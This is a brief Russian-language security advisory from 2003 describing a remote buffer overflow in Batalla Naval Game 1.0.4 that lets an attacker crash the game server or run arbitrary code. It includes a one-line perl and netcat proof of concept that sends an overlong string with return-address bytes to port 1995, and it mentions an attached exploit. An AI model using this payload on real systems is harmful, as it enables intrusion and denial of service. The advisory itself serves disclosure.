Security Lab

Удаленное выполнение произвольного кода в Batalla Naval game

Дата публикации:03.06.2003
Всего просмотров:1059
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Переполнение буфера обнаружено в Batalla Naval game. Удаленный пользователь может аварийно завершить игру на сервере или выполнить произвольный код.

Сообщается, что удаленный пользователь может послать чрезмерно длинную строку на целевой сервер, чтобы вызвать переполнение буфера. Пример:

(perl -e 'print "A" x 500 . "\xdc\xf8\x04\x08" . "\x0f\xff\xff\xbf" x 20 . "\r\n"';cat) | nc localhost 1995
Уязвимость может использоваться для выполнения произвольного кода. Эксплоит прилагается.

Уязвимость обнаружена в Batalla Naval Game 1.0.4

Ссылки: Эксплоит
=?iso-8859-1?Q?[Priv8security_Advisory]_Batalla_Naval_remote_overflow?=